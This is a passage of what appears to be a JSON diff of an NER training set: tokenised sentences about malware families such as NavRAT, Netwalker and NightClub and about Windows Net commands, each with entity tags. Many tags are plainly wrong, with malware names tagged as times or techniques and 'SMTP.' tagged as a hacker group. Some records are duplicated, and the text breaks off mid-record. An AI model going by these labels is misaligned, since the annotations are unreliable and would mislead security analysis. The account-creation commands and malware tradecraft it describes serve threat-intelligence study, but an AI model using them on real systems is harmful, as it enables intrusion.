"tokens": [ + "NavRAT", + "logs", + "the", + "keystrokes", + "on", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NavRAT", + "writes", + "multiple", + "outputs", + "to", + "a", + "TMP", + "file", + "using", + "the", + ">>", + "method." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "NavRAT", + "uses", + "the", + "email", + "platform,", + "Naver,", + "for", + "C2", + "communications,", + "leveraging", + "SMTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "NavRAT", + "uses", + "<code>tasklist", + "/v</code>", + "to", + "check", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NavRAT", + "copies", + "itself", + "into", + "a", + "running", + "Internet", + "Explorer", + "process", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NavRAT", + "creates", + "a", + "Registry", + "key", + "to", + "ensure", + "a", + "file", + "gets", + "executed", + "upon", + "reboot", + "in", + "order", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Tool", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NavRAT", + "uses", + "<code>systeminfo</code>", + "on", + "a", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NavRAT", + "leverages", + "cmd.exe", + "to", + "perform", + "discovery", + "techniques.", + "NavRAT", + "loads", + "malicious", + "shellcode", + "and", + "executes", + "it", + "in", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "can", + "use", + "DLL", + "side-loading", + "to", + "gain", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "has", + "the", + "capability", + "to", + "upload", + "collected", + "files", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "has", + "the", + "ability", + "to", + "delete", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Nebulae", + "can", + "list", + "files", + "and", + "directories", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "can", + "download", + "files", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "has", + "created", + "a", + "service", + "named", + "\"Windows", + "Update", + "Agent1\"", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "uses", + "functions", + "named", + "<code>StartUserModeBrowserInjection</code>", + "and", + "<code>StopUserModeBrowserInjection</code>", + "indicating", + "that", + "it's", + "trying", + "to", + "imitate", + "chrome_frame_helper.dll." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Nebulae", + "has", + "the", + "ability", + "to", + "use", + "<code>CreateProcess</code>", + "to", + "execute", + "a", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "can", + "use", + "TCP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "can", + "enumerate", + "processes", + "on", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "can", + "achieve", + "persistence", + "through", + "a", + "Registry", + "Run", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "can", + "use", + "RC4", + "and", + "XOR", + "to", + "encrypt", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "can", + "discover", + "logical", + "drive", + "information", + "including", + "the", + "drive", + "type,", + "free", + "space,", + "and", + "volume", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "can", + "use", + "CMD", + "to", + "execute", + "a", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nebulae", + "can", + "create", + "a", + "service", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Neoichor", + "can", + "use", + "the", + "Internet", + "Explorer", + "(IE)", + "COM", + "interface", + "to", + "connect", + "and", + "receive", + "commands", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Neoichor", + "can", + "upload", + "files", + "from", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Neoichor", + "can", + "clear", + "the", + "browser", + "history", + "on", + "a", + "compromised", + "host", + "by", + "changing", + "the", + "`ClearBrowsingHistoryOnExit`", + "value", + "to", + "1", + "in", + "the", + "`HKEY_CURRENT_USER\\Software\\Microsoft\\Internet", + "Explorer\\Privacy`", + "Registry", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Neoichor", + "can", + "download", + "additional", + "files", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Neoichor", + "can", + "check", + "for", + "Internet", + "connectivity", + "by", + "contacting", + "bing[.]com", + "with", + "the", + "request", + "format", + "`bing[.]com?id=<GetTickCount>`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Neoichor", + "has", + "the", + "ability", + "to", + "configure", + "browser", + "settings", + "by", + "modifying", + "Registry", + "entries", + "under", + "`HKEY_CURRENT_USER\\Software\\Microsoft\\Internet", + "Explorer`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Neoichor", + "can", + "collect", + "the", + "OS", + "version", + "and", + "computer", + "name", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Neoichor", + "can", + "identify", + "the", + "system", + "language", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Neoichor", + "can", + "gather", + "the", + "IP", + "address", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Neoichor", + "can", + "collect", + "the", + "user", + "name", + "from", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Neoichor", + "can", + "use", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nerex", + "drops", + "a", + "signed", + "Microsoft", + "DLL", + "to", + "disk." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nerex", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "download", + "files", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nerex", + "creates", + "a", + "Registry", + "subkey", + "that", + "registers", + "a", + "new", + "service." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nerex", + "creates", + "a", + "Registry", + "subkey", + "that", + "registers", + "a", + "new", + "service." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Net", + "commands", + "used", + "with", + "the", + "<code>/domain</code>", + "flag", + "can", + "be", + "used", + "to", + "gather", + "information", + "about", + "and", + "manipulate", + "user", + "accounts", + "on", + "the", + "current", + "domain." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "<code>net", + "user", + "username", + "\\password", + "\\domain</code>", + "commands", + "in", + "Net", + "can", + "be", + "used", + "to", + "create", + "a", + "domain", + "account." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Commands", + "such", + "as", + "<code>net", + "group", + "/domain</code>", + "can", + "be", + "used", + "in", + "Net", + "to", + "gather", + "information", + "about", + "and", + "manipulate", + "groups." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Commands", + "under", + "<code>net", + "user</code>", + "can", + "be", + "used", + "in", + "Net", + "to", + "gather", + "information", + "about", + "and", + "manipulate", + "user", + "accounts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "<code>net", + "user", + "username", + "\\password</code>", + "commands", + "in", + "Net", + "can", + "be", + "used", + "to", + "create", + "a", + "local", + "account." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Commands", + "such", + "as", + "<code>net", + "group</code>", + "and", + "<code>net", + "localgroup</code>", + "can", + "be", + "used", + "in", + "Net", + "to", + "gather", + "information", + "about", + "and", + "manipulate", + "groups." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "<code>net", + "use", + "\\\\system\\share", + "/delete</code>", + "command", + "can", + "be", + "used", + "in", + "Net", + "to", + "remove", + "an", + "established", + "connection", + "to", + "a", + "network", + "share." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Features", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "<code>net", + "view", + "\\\\remotesystem</code>", + "and", + "<code>net", + "share</code>", + "commands", + "in", + "Net", + "can", + "be", + "used", + "to", + "find", + "shared", + "drives", + "and", + "directories", + "on", + "remote", + "and", + "local", + "systems", + "respectively." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "<code>net", + "accounts</code>", + "and", + "<code>net", + "accounts", + "/domain</code>", + "commands", + "with", + "Net", + "can", + "be", + "used", + "to", + "obtain", + "password", + "policy", + "information." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Commands", + "such", + "as", + "<code>net", + "view</code>", + "can", + "be", + "used", + "in", + "Net", + "to", + "gather", + "information", + "about", + "available", + "remote", + "systems." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lateral", + "movement", + "can", + "be", + "done", + "with", + "Net", + "through", + "<code>net", + "use</code>", + "commands", + "to", + "connect", + "to", + "the", + "on", + "remote", + "systems." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "<code>net", + "start</code>", + "and", + "<code>net", + "stop</code>", + "commands", + "can", + "be", + "used", + "in", + "Net", + "to", + "execute", + "or", + "stop", + "Windows", + "services." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Commands", + "such", + "as", + "<code>net", + "use</code>", + "and", + "<code>net", + "session</code>", + "can", + "be", + "used", + "in", + "Net", + "to", + "gather", + "information", + "about", + "network", + "connections", + "from", + "a", + "particular", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "<code>net", + "start</code>", + "command", + "can", + "be", + "used", + "in", + "Net", + "to", + "find", + "information", + "about", + "Windows", + "services." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "<code>net", + "time</code>", + "command", + "can", + "be", + "used", + "in", + "Net", + "to", + "determine", + "the", + "local", + "or", + "remote", + "system", + "time." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Net", + "Crawler", + "uses", + "credential", + "dumpers", + "such", + "as", + "Mimikatz", + "and", + "Windows", + "Credential", + "Editor", + "to", + "extract", + "cached", + "credentials", + "from", + "Windows", + "systems." + ], + "ner_tags": [ + "B-Tool", + "B-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Net", + "Crawler", + "uses", + "a", + "list", + "of", + "known", + "credentials", + "gathered", + "through", + "credential", + "dumping", + "to", + "guess", + "passwords", + "to", + "accounts", + "as", + "it", + "spreads", + "throughout", + "a", + "network." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Net", + "Crawler", + "uses", + "Windows", + "admin", + "shares", + "to", + "establish", + "authenticated", + "sessions", + "to", + "remote", + "systems", + "over", + "SMB", + "as", + "part", + "of", + "lateral", + "movement." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Net", + "Crawler", + "uses", + "PsExec", + "to", + "perform", + "remote", + "service", + "manipulation", + "to", + "execute", + "a", + "copy", + "of", + "itself", + "as", + "part", + "of", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Tool", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NetTraveler", + "reports", + "window", + "names", + "along", + "with", + "keylogger", + "information", + "to", + "provide", + "application", + "context." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NetTraveler", + "contains", + "a", + "keylogger." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Netwalker's", + "PowerShell", + "script", + "has", + "been", + "obfuscated", + "with", + "multiple", + "layers", + "including", + "base64", + "and", + "hexadecimal", + "encoding", + "and", + "XOR-encryption,", + "as", + "well", + "as", + "obfuscated", + "PowerShell", + "functions", + "and", + "variables." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Netwalker", + "can", + "encrypt", + "files", + "on", + "infected", + "machines", + "to", + "extort", + "victims." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Netwalker's", + "PowerShell", + "script", + "can", + "decode", + "and", + "decrypt", + "multiple", + "layers", + "of", + "obfuscation,", + "leading", + "to", + "the", + "Netwalker", + "DLL", + "being", + "loaded", + "into", + "memory." + ], + "ner_tags": [ + "B-Way", + "B-Way", + "B-Tool", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Netwalker", + "can", + "detect", + "and", + "terminate", + "active", + "security", + "software-related", + "processes", + "on", + "infected", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Netwalker", + "DLL", + "has", + "been", + "injected", + "reflectively", + "into", + "the", + "memory", + "of", + "a", + "legitimate", + "running", + "process." + ], + "ner_tags": [ + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Netwalker's", + "DLL", + "has", + "been", + "embedded", + "within", + "the", + "PowerShell", + "script", + "in", + "hex", + "format." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Operators", + "deploying", + "Netwalker", + "have", + "used", + "psexec", + "and", + "certutil", + "to", + "retrieve", + "the", + "Netwalker", + "payload." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Netwalker", + "can", + "delete", + "the", + "infected", + "system's", + "Shadow", + "Volumes", + "to", + "prevent", + "recovery." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Operators", + "deploying", + "Netwalker", + "have", + "used", + "psexec", + "to", + "copy", + "the", + "Netwalker", + "payload", + "across", + "accessible", + "systems." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Netwalker", + "can", + "add", + "the", + "following", + "registry", + "entry:", + "<code>HKEY_CURRENT_USER\\SOFTWARE\\{8", + "random", + "characters}</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Netwalker", + "can", + "use", + "Windows", + "API", + "functions", + "to", + "inject", + "the", + "ransomware", + "DLL." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Netwalker", + "has", + "been", + "written", + "in", + "PowerShell", + "and", + "executed", + "directly", + "in", + "memory,", + "avoiding", + "detection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Netwalker", + "can", + "detect", + "and", + "terminate", + "active", + "security", + "software-related", + "processes", + "on", + "infected", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Operators", + "deploying", + "Netwalker", + "have", + "used", + "psexec", + "and", + "certutil", + "to", + "retrieve", + "the", + "Netwalker", + "payload." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Netwalker", + "can", + "terminate", + "system", + "processes", + "and", + "services,", + "some", + "of", + "which", + "relate", + "to", + "backup", + "software." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Netwalker", + "can", + "determine", + "the", + "system", + "architecture", + "it", + "is", + "running", + "on", + "to", + "choose", + "which", + "version", + "of", + "the", + "DLL", + "to", + "use." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Operators", + "deploying", + "Netwalker", + "have", + "used", + "batch", + "scripts", + "to", + "retrieve", + "the", + "Netwalker", + "payload." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Netwalker", + "can", + "use", + "WMI", + "to", + "delete", + "Shadow", + "Volumes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nidiran", + "can", + "download", + "and", + "execute", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Nidiran", + "can", + "create", + "a", + "new", + "service", + "named", + "msamger", + "(Microsoft", + "Security", + "Accounts", + "Manager),", + "which", + "mimics", + "the", + "legitimate", + "Microsoft", + "database", + "by", + "the", + "same", + "name." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Nidiran", + "can", + "create", + "a", + "new", + "service", + "named", + "msamger", + "(Microsoft", + "Security", + "Accounts", + "Manager)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "use", + "`GetForegroundWindow`", + "to", + "enumerate", + "the", + "active", + "window." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "load", + "a", + "module", + "to", + "leverage", + "the", + "LAME", + "encoder", + "and", + "`mciSendStringW`", + "to", + "control", + "and", + "capture", + "audio." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "use", + "a", + "DNS", + "tunneling", + "plugin", + "to", + "exfiltrate", + "data", + "by", + "adding", + "it", + "to", + "the", + "subdomain", + "portion", + "of", + "a", + "DNS", + "request." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "B-SamFile", + "B-Purp", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "use", + "a", + "file", + "monitor", + "to", + "steal", + "specific", + "files", + "from", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "use", + "SMTP", + "and", + "DNS", + "for", + "file", + "exfiltration", + "and", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "use", + "a", + "file", + "monitor", + "to", + "identify", + ".lnk,", + ".doc,", + ".docx,", + ".xls,", + ".xslx,", + "and", + ".pdf", + "files." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "load", + "multiple", + "additional", + "plugins", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "use", + "a", + "plugin", + "for", + "keylogging." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "NightClub", + "has", + "copied", + "captured", + "files", + "and", + "keystrokes", + "to", + "the", + "`%TEMP%`", + "directory", + "of", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "can", + "use", + "emails", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "has", + "created", + "a", + "service", + "named", + "`WmdmPmSp`", + "to", + "spoof", + "a", + "Windows", + "Media", + "service." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NightClub", + "has", + "chosen", + "file", + "names", + "to", + "appear", + "legitimate", + "including", + "EsetUpdate-0117583943.exe", + "for", + "its", + "dropper." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 